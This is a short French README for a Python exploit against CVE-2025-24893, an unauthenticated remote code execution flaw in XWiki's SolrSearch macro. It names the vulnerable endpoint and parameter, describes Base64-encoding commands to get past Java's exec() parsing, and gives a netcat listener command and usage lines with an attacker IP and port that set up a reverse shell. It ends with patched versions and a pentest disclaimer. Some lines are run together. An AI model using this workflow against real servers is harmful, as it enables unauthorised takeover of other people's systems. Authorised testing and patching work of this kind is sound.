
Exploit d'exécution de code à distance (RCE) dans XWiki
Exploit d'Exécution de Code à Distance (RCE) dans XWiki
Un exploit en Python3 pour la CVE-2025-24893, une vulnérabilité critique d'Exécution de Code à Distance Non Authentifiée (RCE) affectant la plateforme XWiki.
Ce script exploite une faille d'Injection de Code/Expression (CWE-95) dans le composant de la macro SolrSearch. La faille permet aux attaquants d'exécuter du code Groovy/Java arbitraire sur le système d'exploitation sous-jacent. L'exploit effectue automatiquement un encodage en Base64 pour contourner les limitations d'interprétation des commandes de la fonction Runtime.getRuntime().exec() de Java.
/bin/get/Main/SolrSearch (via le paramètre text)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
Exemple :
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsPour installer la dépendance nécessaire :
pip install requests
Mettez à jour votre instance XWiki vers l'une des versions officielles corrigées : 15.10.11, 16.4.1, 16.5.0-rc-1 (ou supérieures).
Ce script a été développé exclusivement à des fins éducatives, pour des audits de sécurité autorisés et des tests d'intrusion (Pentest). L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou d'activités illégales causés par cet outil. L'utilisation de ce script contre des cibles sans autorisation préalable est strictement illégale.